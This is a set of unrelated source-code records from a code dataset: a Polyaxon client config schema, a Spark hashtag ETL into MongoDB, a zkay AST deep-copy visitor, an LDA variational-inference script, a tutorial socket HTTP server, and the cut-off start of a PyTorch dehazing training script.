implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport polyaxon_sdk\n\nfrom marshmallow import EXCLUDE, fields\n\nfrom polyaxon.api import get_default_host\nfrom polyaxon.containers.contexts import CONTEXT_ARCHIVE_ROOT\nfrom polyaxon.env_vars.keys import (\n POLYAXON_KEYS_API_VERSION,\n POLYAXON_KEYS_ARCHIVE_ROOT,\n POLYAXON_KEYS_ASSERT_HOSTNAME,\n POLYAXON_KEYS_AUTHENTICATION_TYPE,\n POLYAXON_KEYS_CERT_FILE,\n POLYAXON_KEYS_CONNECTION_POOL_MAXSIZE,\n POLYAXON_KEYS_DEBUG,\n POLYAXON_KEYS_DISABLE_ERRORS_REPORTING,\n POLYAXON_KEYS_HEADER,\n POLYAXON_KEYS_HEADER_SERVICE,\n POLYAXON_KEYS_HOST,\n POLYAXON_KEYS_INTERVAL,\n POLYAXON_KEYS_INTERVALS_COMPATIBILITY_CHECK,\n POLYAXON_KEYS_IS_MANAGED,\n POLYAXON_KEYS_IS_OFFLINE,\n POLYAXON_KEYS_IS_OPS,\n POLYAXON_KEYS_K8S_IN_CLUSTER,\n POLYAXON_KEYS_K8S_NAMESPACE,\n POLYAXON_KEYS_KEY_FILE,\n POLYAXON_KEYS_LOG_LEVEL,\n POLYAXON_KEYS_NO_API,\n POLYAXON_KEYS_NO_OP,\n POLYAXON_KEYS_SERVICE,\n POLYAXON_KEYS_SSL_CA_CERT,\n POLYAXON_KEYS_TIME_ZONE,\n POLYAXON_KEYS_TIMEOUT,\n POLYAXON_KEYS_TRACKING_TIMEOUT,\n POLYAXON_KEYS_VERIFY_SSL,\n POLYAXON_KEYS_WATCH_INTERVAL,\n)\nfrom polyaxon.exceptions import PolyaxonClientException\nfrom polyaxon.pkg import VERSION\nfrom polyaxon.schemas.base import BaseConfig, BaseSchema\nfrom polyaxon.services.auth import AuthenticationTypes\nfrom polyaxon.services.headers import PolyaxonServiceHeaders, PolyaxonServices\nfrom polyaxon.utils.http_utils import clean_host, clean_verify_ssl\n\n\nclass ClientSchema(BaseSchema):\n service = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_SERVICE)\n host = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_HOST)\n version = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_API_VERSION)\n debug = fields.Bool(allow_none=True, data_key=POLYAXON_KEYS_DEBUG)\n log_level = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_LOG_LEVEL)\n authentication_type = fields.Str(\n allow_none=True, data_key=POLYAXON_KEYS_AUTHENTICATION_TYPE\n )\n is_managed = fields.Bool(allow_none=True, data_key=POLYAXON_KEYS_IS_MANAGED)\n is_offline = fields.Bool(allow_none=True, data_key=POLYAXON_KEYS_IS_OFFLINE)\n is_ops = fields.Bool(allow_none=True, data_key=POLYAXON_KEYS_IS_OPS)\n in_cluster = fields.Bool(allow_none=True, data_key=POLYAXON_KEYS_K8S_IN_CLUSTER)\n no_op = fields.Bool(allow_none=True, data_key=POLYAXON_KEYS_NO_OP)\n timeout = fields.Float(allow_none=True, data_key=POLYAXON_KEYS_TIMEOUT)\n tracking_timeout = fields.Float(\n allow_none=True, data_key=POLYAXON_KEYS_TRACKING_TIMEOUT\n )\n timezone = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_TIME_ZONE)\n watch_interval = fields.Int(allow_none=True, data_key=POLYAXON_KEYS_WATCH_INTERVAL)\n interval = fields.Float(allow_none=True, data_key=POLYAXON_KEYS_INTERVAL)\n verify_ssl = fields.Bool(allow_none=True, data_key=POLYAXON_KEYS_VERIFY_SSL)\n ssl_ca_cert = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_SSL_CA_CERT)\n cert_file = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_CERT_FILE)\n key_file = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_KEY_FILE)\n assert_hostname = fields.Bool(\n allow_none=True, data_key=POLYAXON_KEYS_ASSERT_HOSTNAME\n )\n connection_pool_maxsize = fields.Int(\n allow_none=True, data_key=POLYAXON_KEYS_CONNECTION_POOL_MAXSIZE\n )\n archive_root = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_ARCHIVE_ROOT)\n\n header = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_HEADER)\n header_service = fields.Str(allow_none=True, 
data_key=POLYAXON_KEYS_HEADER_SERVICE)\n\n namespace = fields.Str(allow_none=True, data_key=POLYAXON_KEYS_K8S_NAMESPACE)\n no_api = fields.Bool(allow_none=True, data_key=POLYAXON_KEYS_NO_API)\n disable_errors_reporting = fields.Bool(\n allow_none=True, data_key=POLYAXON_KEYS_DISABLE_ERRORS_REPORTING\n )\n compatibility_check_interval = fields.Int(\n allow_none=True, data_key=POLYAXON_KEYS_INTERVALS_COMPATIBILITY_CHECK\n )\n\n @staticmethod\n def schema_config():\n return ClientConfig\n\n\nclass ClientConfig(BaseConfig):\n SCHEMA = ClientSchema\n IDENTIFIER = \"global\"\n\n PAGE_SIZE = 20\n BASE_URL = \"{}/api/{}\"\n\n UNKNOWN_BEHAVIOUR = EXCLUDE\n\n REDUCED_ATTRIBUTES = [\n POLYAXON_KEYS_SERVICE,\n POLYAXON_KEYS_HOST,\n POLYAXON_KEYS_API_VERSION,\n POLYAXON_KEYS_ASSERT_HOSTNAME,\n POLYAXON_KEYS_AUTHENTICATION_TYPE,\n POLYAXON_KEYS_CERT_FILE,\n POLYAXON_KEYS_CONNECTION_POOL_MAXSIZE,\n POLYAXON_KEYS_ARCHIVE_ROOT,\n POLYAXON_KEYS_DEBUG,\n POLYAXON_KEYS_HEADER,\n POLYAXON_KEYS_HEADER_SERVICE,\n POLYAXON_KEYS_K8S_IN_CLUSTER,\n POLYAXON_KEYS_INTERVAL,\n POLYAXON_KEYS_IS_MANAGED,\n POLYAXON_KEYS_IS_OFFLINE,\n POLYAXON_KEYS_IS_OPS,\n POLYAXON_KEYS_K8S_NAMESPACE,\n POLYAXON_KEYS_KEY_FILE,\n POLYAXON_KEYS_LOG_LEVEL,\n POLYAXON_KEYS_NO_API,\n POLYAXON_KEYS_NO_OP,\n POLYAXON_KEYS_SSL_CA_CERT,\n POLYAXON_KEYS_TIMEOUT,\n POLYAXON_KEYS_TRACKING_TIMEOUT,\n POLYAXON_KEYS_VERIFY_SSL,\n POLYAXON_KEYS_WATCH_INTERVAL,\n POLYAXON_KEYS_DISABLE_ERRORS_REPORTING,\n POLYAXON_KEYS_INTERVALS_COMPATIBILITY_CHECK,\n ]\n\n def __init__(\n self,\n service=None,\n host=None,\n token=None,\n debug=None,\n log_level=None,\n version=None,\n authentication_type=None,\n is_managed=None,\n is_offline=None,\n is_ops=None,\n in_cluster=None,\n no_op=None,\n timeout=None,\n tracking_timeout=None,\n timezone=None,\n watch_interval=None,\n interval=None,\n verify_ssl=None,\n ssl_ca_cert=None,\n cert_file=None,\n key_file=None,\n assert_hostname=None,\n connection_pool_maxsize=None,\n archive_root=None,\n header=None,\n header_service=None,\n namespace=None,\n no_api=None,\n disable_errors_reporting=None,\n compatibility_check_interval=None,\n **kwargs\n ):\n self.service = service\n self.host = clean_host(get_default_host(host, service))\n self.token = token\n self.debug = self._get_bool(debug, False)\n self.log_level = log_level\n self.version = version or \"v1\"\n self.is_managed = self._get_bool(is_managed, False)\n self.is_offline = self._get_bool(is_offline, False)\n self.is_ops = self._get_bool(is_ops, False)\n self.in_cluster = self._get_bool(in_cluster, False)\n self.no_op = self._get_bool(no_op, False)\n self.verify_ssl = clean_verify_ssl(\n host=self.host, verify_ssl=self._get_bool(verify_ssl, None)\n )\n self.ssl_ca_cert = ssl_ca_cert\n self.cert_file = cert_file\n self.key_file = key_file\n self.assert_hostname = self._get_bool(assert_hostname, None)\n self.connection_pool_maxsize = connection_pool_maxsize\n self.archive_root = archive_root or CONTEXT_ARCHIVE_ROOT\n self.header = header\n self.header_service = header_service\n self.timeout = timeout or 20\n self.tracking_timeout = tracking_timeout or 1\n self.timezone = timezone\n self.interval = interval or 5\n self.watch_interval = watch_interval or 5\n self.namespace = namespace\n self.no_api = self._get_bool(no_api, False)\n self.authentication_type = authentication_type or AuthenticationTypes.TOKEN\n self.disable_errors_reporting = self._get_bool(disable_errors_reporting, False)\n self.compatibility_check_interval = compatibility_check_interval\n\n 
self.client_header = {}\n\n if all([self.header, self.header_service]):\n self.client_header[\"header_name\"] = self.header\n self.client_header[\"header_value\"] = self.header_service\n\n @property\n def base_url(self):\n return self.BASE_URL.format(clean_host(self.host), self.version)\n\n def set_cli_header(self):\n self.header = PolyaxonServiceHeaders.get_header(PolyaxonServiceHeaders.SERVICE)\n self.header_service = VERSION\n self.client_header[\"header_name\"] = self.header\n self.client_header[\"header_value\"] = self.header_service\n\n def set_agent_header(self):\n self.header = PolyaxonServiceHeaders.get_header(PolyaxonServiceHeaders.SERVICE)\n self.header_service = PolyaxonServices.AGENT\n self.client_header[\"header_name\"] = self.header\n self.client_header[\"header_value\"] = self.header_service\n\n @property\n def sdk_config(self):\n if not self.host and not self.in_cluster:\n raise PolyaxonClientException(\n \"Api config requires at least a host if not running in-cluster.\"\n )\n\n config = polyaxon_sdk.Configuration()\n config.debug = self.debug\n config.host = clean_host(self.host)\n config.verify_ssl = clean_verify_ssl(\n host=config.host, verify_ssl=self.verify_ssl\n )\n config.ssl_ca_cert = self.ssl_ca_cert\n config.cert_file = self.cert_file\n config.key_file = self.key_file\n config.assert_hostname = self.assert_hostname\n if self.connection_pool_maxsize:\n config.connection_pool_maxsize = self.connection_pool_maxsize\n if self.token:\n config.api_key[\"ApiKey\"] = self.token\n config.api_key_prefix[\"ApiKey\"] = self.authentication_type\n return config\n\n @staticmethod\n def _get_bool(value, default_value):\n if isinstance(value, bool):\n return value\n\n return default_value\n","sub_path":"src/polyaxon/schemas/cli/client_config.py","file_name":"client_config.py","file_ext":"py","file_size_in_byte":10259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"406879141","text":"import json\nimport re\nimport sys\nimport time\nimport dateutil.parser as du\nfrom pymongo import MongoClient\nfrom pyspark.sql import SparkSession, SQLContext, Row\nfrom pyspark.sql.functions import explode, udf, collect_list, struct\nfrom pyspark.sql.types import StructField, StructType, IntegerType, StringType, ArrayType\n\n# build\nspark = SparkSession.builder.appName(\"Preprocessing App\").getOrCreate()\nsc = spark.sparkContext\nsqlContext = SQLContext(sc)\n\n\"\"\"\nUser Defined function to extract tweet times\n\"\"\"\ndef get_tweet_time(s):\n # parsing with dateutil parser\n now = du.parse(s)\n # Keep tweet occurances at 1-hour intervals\n current_tweet_time = str(now.year) + \"-\" + str(now.month) + \"-\" + str(now.day) + \" \" + str(now.hour) + \":00\"\n return current_tweet_time\n\n# register method\ntweet_time = udf(lambda z: get_tweet_time(z))\nspark.udf.register(\"tweet_time\", tweet_time)\n\n\n\"\"\"\nExtract just the Hashtags as entities\n\"\"\"\ndef _get_hashtag(entities):\n return(entities.text)\n\n# register method\nget_hash_tag = udf(lambda z: _get_hashtag(z))\nspark.udf.register(\"get_hash_tag\", get_hash_tag)\n\ndef transform_Data(extracted_sql_table):\n HashTagsTable = extracted_sql_table.select(\"created_at\", explode( \"hashtags\"))\n HashTagsTable_WithDates = HashTagsTable.withColumn('Keyword', get_hash_tag('col')).withColumn('Time', tweet_time('created_at') )\n # clean up table\n columns_to_drop = ['created_at', 'col']\n hashtags_table = HashTagsTable_WithDates.drop(*columns_to_drop)\n before_aggregation = 
hashtags_table.groupBy('Keyword', 'Time').count() \n after_aggregation = (before_aggregation.groupBy(\"Keyword\").agg(collect_list(struct(\"Time\", \"count\")).alias('occurances')))\n return(after_aggregation)\n\ndef main():\n with open('test_hashtagoldnews_config.json', 'r') as config_file:\n config_dict = json.load(config_file)\n folder_data = sqlContext.read.json(config_dict['S3_root'] + \"/Unzipped\")\n folder_data.registerTempTable(\"tweets\")\n client = MongoClient(config_dict['mongo_path'])\n \n db = client.all_tweets\n extracted_SQL_table = sqlContext.sql(\"SELECT distinct id, created_at, lang, entities.hashtags FROM tweets WHERE lang = 'en' AND size(entities.hashtags) > 0\")\n after_aggregation = transform_Data(extracted_SQL_table)\n \n # for unittesting \n # write transformed version of data to Parquet\n #(after_aggregation\n # .coalesce(1)\n # .write\n # .parquet('oldnews_report', mode='overwrite'))\n\n # insertion\n for row in after_aggregation.rdd.collect():\n db.full_db_compressed.update( { \"Keyword\" : row.Keyword }, { \"$push\" : { \"occurance\" : row.occurances}},upsert=True)\n spark.stop()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ETL/spark_submit_mongo.py","file_name":"spark_submit_mongo.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"457233669","text":"import inspect\n\nfrom zkay_ast.ast import AST\nfrom zkay_ast.pointers.parent_setter import set_parents\nfrom zkay_ast.pointers.symbol_table import link_identifiers\nfrom zkay_ast.visitor.visitor import AstVisitor\n\n\ndef deep_copy(ast: AST):\n\t\"\"\"\n\n\t:param ast:\n\t:return: a deep copy of `ast`\n\n\tOnly parents and identifiers are updated in the returned ast (e.g., inferred types are not preserved)\n\t\"\"\"\n\tv = DeepCopyVisitor()\n\tast_copy = v.visit(ast)\n\tast_copy.parent = ast.parent\n\tset_parents(ast_copy)\n\tlink_identifiers(ast_copy)\n\treturn ast_copy\n\n\nclass DeepCopyVisitor(AstVisitor):\n\n\tdef __init__(self):\n\t\tsuper().__init__('node-or-children')\n\n\tdef visitChildren(self, ast):\n\t\tc = ast.__class__\n\t\targs_names = inspect.getfullargspec(c.__init__).args[1:]\n\t\tnew_fields = {}\n\t\tfor arg_name in args_names:\n\t\t\told_field = getattr(ast, arg_name)\n\t\t\tnew_fields[arg_name] = self.copy_field(old_field)\n\t\tfor k in ast.__dict__.keys():\n\t\t\tsetting_later = [\n\t\t\t\t'parent',\n\t\t\t\t'names',\n\t\t\t\t'had_privacy_annotation',\n\t\t\t\t'annotated_type',\n\t\t\t\t'statement',\n\t\t\t\t'before_analysis',\n\t\t\t\t'after_analysis',\n\t\t\t\t'target',\n\t\t\t\t'instantiated_key',\n\t\t\t\t'function',\n\t\t\t\t'is_private'\n\t\t\t]\n\t\t\tif k not in new_fields and k not in setting_later:\n\t\t\t\traise ValueError(\"Not copying\", k)\n\t\treturn c(**new_fields)\n\n\tdef visitAnnotatedTypeName(self, ast):\n\t\tast_copy = self.visitChildren(ast)\n\t\tast_copy.had_privacy_annotation = ast.had_privacy_annotation\n\t\treturn ast_copy\n\n\tdef copy_field(self, field):\n\t\tif field is None:\n\t\t\treturn None\n\t\telif isinstance(field, str) or isinstance(field, int) or isinstance(field, bool):\n\t\t\treturn field\n\t\telif isinstance(field, list):\n\t\t\treturn [self.copy_field(e) for e in field]\n\t\telse:\n\t\t\treturn self.visit(field)\n","sub_path":"src/zkay_ast/visitor/deep_copy.py","file_name":"deep_copy.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} 
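The zkay DeepCopyVisitor above rebuilds each AST node by inspecting its constructor signature; below is a framework-free sketch of the same inspect.getfullargspec trick. The Node class and its fields are invented for illustration and are not zkay types.

    import inspect

    class Node:
        def __init__(self, name, children):
            self.name = name
            self.children = children

    def shallow_clone(obj):
        # Read the constructor's argument names (skipping 'self') and
        # re-invoke the class with the matching attribute values, much
        # as DeepCopyVisitor.visitChildren does field by field.
        cls = obj.__class__
        arg_names = inspect.getfullargspec(cls.__init__).args[1:]
        return cls(**{name: getattr(obj, name) for name in arg_names})

    n = Node('root', ['a', 'b'])
    m = shallow_clone(n)
    assert m is not n and m.name == n.name and m.children == n.children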
+{"seq_id":"430256540","text":"import numpy as np\nfrom scipy.special import digamma as dga\nfrom scipy.special import gamma as ga\nfrom scipy.special import loggamma as lga\n\ndata = np.load(\"mcs_hw4_p1_lda.npy\")\n\nvocab = np.array([i for i in range(100)])\n\nnum_doc = data.shape[0]\nnum_vocab = vocab.shape[0]\nlen_doc = data.shape[1]\nnum_topic = 10\n\nw = np.zeros([num_doc, len_doc, num_vocab])\nfor d in range(num_doc):\n for n in range(len_doc):\n w[d, n, data[d, n]] = 1\n\nalpha = np.ones(shape=num_topic)\neta = np.ones(shape=num_vocab)\n\neps=1e-20\ndef log(x):\n return np.log(x + eps)\n\ndef digamma(x):\n return dga(x + eps)\n\ndef loggamma(x):\n return lga(x + eps)\n\ndef init(data):\n\n phi = np.random.rand(num_doc, len_doc, num_topic)\n for d in range(num_doc):\n for n in range(len_doc):\n phi[d, n] /= np.sum(phi[d, n])\n\n gam = np.random.rand(num_doc, num_topic)\n gam /= np.sum(gam, axis=1)[:, np.newaxis]\n\n lam = np.random.rand(num_topic, num_vocab)\n lam /= np.sum(lam, axis=1)[:, np.newaxis]\n return lam, gam, phi, w, num_doc, num_topic, num_vocab, len_doc, alpha, eta\n\ndef one_step_batch(lam, gam, phi, w, num_doc, num_topic, num_vocab, len_doc, alpha, eta, d_list):\n #print(num_doc, num_topic, num_vocab)\n for d in d_list:\n gam[d] = alpha + np.sum(phi[d], axis=0)\n #gam /= np.sum(gam, axis=1)[:, np.newaxis]\n \n def get_single_doc(lam, gam, phi, w, d):\n for n in range(len_doc):\n #phi[d, n, :] = np.exp(digamma(gam[d, :]) + digamma(lam[:, data[d, n]]) - digamma(np.sum(lam, axis=1)))\n for k in range(num_topic):\n phi[d, n, k] = np.exp(digamma(lam[k, data[d, n]]) - digamma(np.sum(lam[k])) + digamma(gam[d, k]) - digamma(np.sum(gam[d])))\n phi[d, n, :] /= np.sum(phi[d, n, :])\n return phi[d], d\n \n with concurrent.futures.ThreadPoolExecutor(max_workers=8) as executor:\n future_list = [executor.submit(get_single_doc, lam, gam, phi, w, d) for d in d_list]\n for future in concurrent.futures.as_completed(future_list):\n phi_d, d = future.result()\n phi[d] = phi_d\n \n lam_new = np.zeros_like(lam)\n for k in range(num_topic):\n lam[k] = eta\n for n in range(len_doc):\n for d in d_list:\n lam_new[k] += phi[d, n, k] * w[d, n]\n #lam /= np.sum(lam, axis=1)[:, np.newaxis]\n lam_new *= num_doc / len(d_list)\n lam = (1 - 0.1) * lam + 0.1 * lam_new\n \n return lam, gam, phi, w, num_doc, num_topic, num_vocab, len_doc, alpha, eta\n\n\nimport concurrent.futures\n\ndef get_res1(lam, gam, phi, w):\n res_1 = 0.0\n res_1 += num_topic * loggamma(np.sum(eta))\n res_1 -= num_topic * np.sum(loggamma(eta))\n '''\n for k in range(num_topic):\n for i in range(num_vocab):\n res_1 += (eta[i] - 1) * (digamma(lam[k, i]) - digamma(np.sum(lam[k])))\n '''\n return res_1\n\n\ndef get_res2(lam, gam, phi, w): \n res_2 = 0.0\n for n in range(len_doc):\n for k in range(num_topic):\n res_2 += phi[:, n, k] * (digamma(gam[:, k]) - digamma(np.sum(gam, axis=1)))\n #res_2 -= digamma(np.sum(gam, axis=1))\n res_2 = np.sum(res_2)\n return res_2\n\n \ndef get_res3(lam, gam, phi, w):\n res_3 = 0.0\n res_3 += loggamma(np.sum(alpha))\n res_3 -= np.sum(loggamma(alpha))\n '''\n for k in range(num_topic):\n res_3 += (alpha[k] - 1) * (digamma(gam[:, k] - digamma(np.sum(gam[:, k]))))\n '''\n res_3 = np.sum(res_3)\n return res_3\n\ndef get_res4(lam, gam, phi, w):\n res_4 = 0.0\n def get_res4_single_loc(lam, gam, phi, w, n):\n res_loc = 0.0\n for k in range(num_topic):\n sum_lam_k = np.sum(lam[k])\n for i in range(num_vocab):\n res_loc += phi[:, n, k] * w[:, n, i] * (digamma(lam[k, i]) - digamma(sum_lam_k))\n res_loc = 
np.sum(res_loc)\n        return res_loc\n\n    with concurrent.futures.ThreadPoolExecutor(max_workers=32) as executor:\n        future_list = [executor.submit(get_res4_single_loc, lam, gam, phi, w, n) for n in range(len_doc)]\n        for future in concurrent.futures.as_completed(future_list):\n            res_4 += future.result()\n    return res_4\n\ndef get_res5(lam, gam, phi, w):\n    res_5 = 0.0\n    for k in range(num_topic):\n        res_5 += loggamma(np.sum(lam[k])) - np.sum(loggamma(lam[k]))\n    for k in range(num_topic):\n        sum_lam_k = np.sum(lam[k])\n        res_5 += np.sum((lam[k] - 1) * (digamma(lam[k]) - digamma(sum_lam_k)))\n        '''\n        for i in range(num_vocab):\n            res_5 += (lam[k, i] - 1) * (digamma(lam[k, i]) - digamma(sum_lam_k))\n        '''\n    return -res_5\n\ndef get_res6(lam, gam, phi, w):\n    res_6 = 0.0\n    res_6 += np.sum(phi * log(phi))\n    return -res_6\n\ndef get_res7(lam, gam, phi, w):\n    res_7 = 0.0\n    res_7 += loggamma(np.sum(gam, axis=1)) - np.sum(loggamma(gam), axis=1)\n    #print(res_7)\n    res_7 = np.sum(res_7)\n    for d in range(num_doc):\n        res_7 += np.sum((gam[d] - 1) * (digamma(gam[d]) - digamma(np.sum(gam[d]))))\n    return -res_7\n\ndef elbo(lam, gam, phi, w):\n    res = 0.0\n    func_list = [get_res1, get_res2, get_res3, get_res4, get_res5, get_res6, get_res7]\n    with concurrent.futures.ThreadPoolExecutor(max_workers=8) as executor:\n        future_list = [executor.submit(func, lam, gam, phi, w) for func in func_list]\n        for future in concurrent.futures.as_completed(future_list):\n            res += future.result()\n\n    return res\n\ndef lda_batched(batch_size):\n    elbo_list = []\n    lam, gam, phi, w, num_doc, num_topic, num_vocab, len_doc, alpha, eta = init(data)\n    for i in range(100):\n        for d in range(int(data.shape[0] / batch_size)):\n            # take the d-th contiguous minibatch of documents (the old index\n            # math only covered the corpus correctly for batch_size == 1)\n            d_list = [j for j in range(d * batch_size, (d + 1) * batch_size)]\n            lam, gam, phi, w, num_doc, num_topic, num_vocab, len_doc, alpha, eta = one_step_batch(lam, gam, phi, w, num_doc, num_topic, num_vocab, len_doc, alpha, eta, d_list)\n        #print(\"iteration \" + str(i) + \" done\")\n        elbo_per_point = elbo(lam, gam, phi, w)\n        elbo_list.append(elbo_per_point)\n        print(elbo_per_point)\n    return elbo_list\n\nfor batch_size in [1]:\n    elbo_list = lda_batched(batch_size)\n    import pickle\n    with open(\"lda_elbo_batch_\" + str(batch_size), \"wb\") as f:\n        pickle.dump(elbo_list, f)\n","sub_path":"Statistical Computing/homework/hw_4/server/4_1_batch1.py","file_name":"4_1_batch1.py","file_ext":"py","file_size_in_byte":6290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"552377719","text":"'''\r\nHTTP request headers\r\nGET POST\r\n\r\nGET /html/rfc2616 HTTP/1.1\r\nHost: tools.ietf.org\r\nConnection: keep-alive\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\n\r\nHTTP response headers\r\nHTTP/1.1 200 OK\r\nAccept-Ranges: bytes\r\nCache-Control: max-age=604800\r\nConnection: Keep-Alive\r\nContent-Encoding: gzip\r\nContent-Location: rfc2616.html\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Sat, 24 Mar 2018 07:52:47 GMT\r\nETag: \"3d2050-83393-567508dabd73a;56823d38ef5d5\"\r\nExpires: Sat, 31 Mar 2018 07:52:47 GMT\r\nKeep-Alive: timeout=5, max=100\r\nLast-Modified: Tue, 13 Mar 2018 19:49:15 GMT\r\nServer: Apache/2.2.22 (Debian)\r\nStrict-Transport-Security: max-age=3600\r\nTCN: choice\r\nTransfer-Encoding: 
chunked\r\nVary: negotiate,Accept-Encoding\r\nX-Clacks-Overhead: GNU Terry Pratchett\r\nX-Content-Type-Options: nosniff\r\nX-Frame-Options: SAMEORIGIN\r\nX-Xss-Protection: 1; mode=block\r\n'''\r\nfrom socket import *\r\nimport os\r\n# Read the HTTP response header template from a file and fill in the returned Content-Length value\r\ndef responseHeaders(file,length):\r\n    f = open(file,'r')\r\n    headersText = f.read()\r\n    f.close()\r\n    headersText = headersText % length\r\n    return headersText\r\n# print(responseHeaders('response_headers.txt',10))\r\n# Map the path in the HTTP request line to a local path on the server\r\ndef filePath(get):\r\n    if get == '/':\r\n        return 'static' + os.sep + 'index.html'\r\n    else:\r\n        paths = get.split('/')\r\n        s = 'static'\r\n        for path in paths:\r\n            if path.strip() != '':\r\n                s = s + os.sep + path\r\n        return s\r\n# print(filePath('/abc/x.txt'))\r\nhost = ''\r\nbufferSize = 1024\r\nport = 9876\r\naddr = (host,port)\r\ntcpServerSocket = socket(AF_INET,SOCK_STREAM)\r\ntcpServerSocket.bind(addr)\r\ntcpServerSocket.listen()\r\nwhile True:\r\n    print(\"Waiting for a client to connect\")\r\n    tcpClientSocket,addr = tcpServerSocket.accept()\r\n    print('Client connected,','addr = ',addr)\r\n    data = tcpClientSocket.recv(bufferSize)\r\n    data = data.decode('utf-8')\r\n    try:\r\n        # Get the first line of the request headers\r\n        firstLine = data.split('\\n')[0]\r\n        # Get the request path\r\n        path = firstLine.split(\" \")[1]\r\n        # Convert the web path to a local path\r\n        path = filePath(path)\r\n        if os.path.exists(path):\r\n            file = open(path,'rb')\r\n            content = file.read()\r\n            file.close()\r\n        else:\r\n            content = \"
<html><body><h1>File Not Found</h1></body></html>
\".encode(encoding='utf-8')\r\n rh = responseHeaders('response_headers.txt',len(content))+'\\r\\n'\r\n tcpClientSocket.send(rh.encode(encoding='utf-8') + content)\r\n except Exception as e:\r\n print(e)\r\n tcpClientSocket.close()\r\ntcpServerSocket.close()","sub_path":"Python学习基础知识/高级python篇/第15章:TCP与UDP编程/用Socket实现HTTP服务器.py","file_name":"用Socket实现HTTP服务器.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"68758164","text":"import argparse\nimport os\nfrom os.path import join\nimport torch\nfrom torch.utils.data import DataLoader\nfrom dataset.data import myDataloader\nimport scipy.misc\nimport imageio\nfrom network.loss import *\nfrom network.SSIM import SSIM\nimport random\nimport re\n\nfrom network.Res29_0 import PaiDehaze\n\nparser = argparse.ArgumentParser(description=\"PyTorch Train\")\nparser.add_argument(\"--batchSize\", type=int, default=8, help=\"Training batch size\")\nparser.add_argument(\"--start_training_step\", type=int, default=2, help=\"Training step\")\nparser.add_argument(\"--nEpochs\", type=int, default=60, help=\"Number of epochs to train\")\nparser.add_argument(\"--lrG\", type=float, default=1e-4, help=\"Learning rate, default=1e-4\")\nparser.add_argument(\"--lrD\", type=float, default=1e-3, help=\"Learning rate, default=1e-4\")\nparser.add_argument(\"--step\", type=int, default=20, help=\"Change the learning rate for every 30 epochs\")\nparser.add_argument(\"--start-epoch\", type=int, default=1, help=\"Start epoch from 1\")\nparser.add_argument(\"--lr_decay\", type=float, default=0.1, help=\"Decay scale of learning rate, default=0.5\")\nparser.add_argument(\"--resume\", default=\"\", type=str, help=\"Path to checkpoint (default: none)\")\nparser.add_argument(\"--scale\", default=4, type=int, help=\"Scale factor, Default: 4\")\nparser.add_argument(\"--lambda_db\", type=float, default=0.5, help=\"Weight of deblurring loss, default=0.5\")\nparser.add_argument(\"--gated\", type=bool, default=True, help=\"Activated gate module\")\nparser.add_argument(\"--isTest\", type=bool, default=False, help=\"Test or not\")\nos.environ['CUDA_VISIBLE_DEVICES'] = '2'\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(device)\n\n#def mkdir_steptraing():\n# root_folder = os.path.abspath('.')\n# models_folder = join(root_folder, 'models/modelW')\n# step1_folder, step2_folder, step3_folder = join(models_folder,'1'), join(models_folder,'2'), join(models_folder, '3')\n# isexists = os.path.exists(step1_folder) and os.path.exists(step2_folder) and os.path.exists(step3_folder)\n# if not isexists:\n# os.makedirs(step1_folder)\n# os.makedirs(step2_folder)\n# os.makedirs(step3_folder)\n# print(\"===> Step training models store in models/1 & /2 & /3.\")\n\n\ndef mkdir_model(path):\n root_folder = os.path.abspath('.')\n models_folder = join(root_folder, path)\n isexists = os.path.exists(models_folder)\n if not isexists:\n os.makedirs(models_folder)\n\n print(\"===> Step training models store in models/1 & /2 & /3.\")\n\n\ndef is_hdf5_file(filename):\n return any(filename.endswith(extension) for extension in [\".h5\"])\n\n\ndef print_network(net):\n if isinstance(net, list):\n net = net[0]\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n print(net)\n print('Total number of parameters: %d' % num_params)\n\n\n#def which_trainingstep_epoch(resume):\n# trainingstep = \"\".join(re.findall(r\"\\d\", resume)[0])\n# start_epoch = 
